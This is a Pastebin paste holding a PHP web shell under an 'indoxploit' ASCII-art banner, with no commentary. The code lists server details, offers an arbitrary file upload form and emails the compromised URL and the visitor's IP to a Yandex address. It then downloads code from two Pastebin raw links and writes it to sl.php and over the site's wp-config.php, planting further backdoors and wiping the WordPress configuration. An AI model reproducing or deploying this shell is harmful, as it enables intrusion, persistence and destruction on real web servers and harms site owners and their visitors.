Advertisement
Sl4ckerc0de

Untitled

May 28th, 2019
580
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.45 KB | None | 0 0
  1. <center>
  2. <header>
  3. <pre>
  4. ___________________________
  5. < root@indoxploit:~# w00t??? >
  6. ---------------------------
  7. \ , ,
  8. \ /( )`
  9. \ \ \___ / |
  10. /- _ `-/ '
  11. (/\/ \ \ /\
  12. / / | ` \
  13. O O ) / |
  14. `-^--'`< '
  15. (_.) _ ) /
  16. `.___/` /
  17. `-----' /
  18. <----. __ / __ \
  19. <----|====O)))==) \) /====>
  20. <----' `--' `.__,' \
  21. | |
  22. \ /
  23. ______( (_ / \______
  24. ,' ,-----' | \
  25. `--{__________) \/
  26. </pre>
  27. </header>
  28. <?php
  29. error_reporting(0);
  30.  
  31. {
  32. echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]<br>";
  33. echo "<font color=#FFFFFF>[pwd]".getcwd()."[/pwd]<br>";
  34. print "\n";$disable_functions = @ini_get("disable_functions");
  35. echo "DisablePHP=".$disable_functions; print "<br>";
  36. echo"<form method=post enctype=multipart/form-data>";
  37. echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
  38. if($_POST["v"]==up)
  39. { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>Ok</b>-->".$_FILES["f"]["name"];}else{echo"<b>error";}}
  40. { if(@copy($_FILES["emad"]["tmp_name"],$_FILES["emad"]["name"])){echo"<b></b>-->".$_FILES["emad"]["name"];}else{echo"<b>";}}};
  41. @ini_set('output_buffering', 0);
  42. @ini_set('display_errors', 0);
  43. set_time_limit(0);
  44. ini_set('memory_limit', '64M');
  45. header('Content-Type: text/html; charset=UTF-8');
  46. $tujuanmail = 'tuyulmama@yandex.com';
  47. $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
  48. $pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
  49. mail($tujuanmail, "Kirim Shell bos", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
  50. function http_get($url){
  51. $im = curl_init($url);
  52. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  53. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  54. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  55. curl_setopt($im, CURLOPT_HEADER, 0);
  56. return curl_exec($im);
  57. curl_close($im);
  58. }
  59. $check2 = $_SERVER['DOCUMENT_ROOT'] . "/sl.php" ;
  60. $text2 = http_get('https://pastebin.com/raw/9NgkF0pd');
  61. $open2 = fopen($check2, 'w');
  62. fwrite($open2, $text2);
  63. fclose($open2);
  64. if(file_exists($check2)){
  65. }
  66. $check2 = $_SERVER['DOCUMENT_ROOT'] . "/wp-config.php" ;
  67. $text2 = http_get('https://pastebin.com/raw/8vMke2t4');
  68. $open2 = fopen($check2, 'w');
  69. fwrite($open2, $text2);
  70. fclose($open2);
  71. if(file_exists($check2)){
  72. }
  73. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement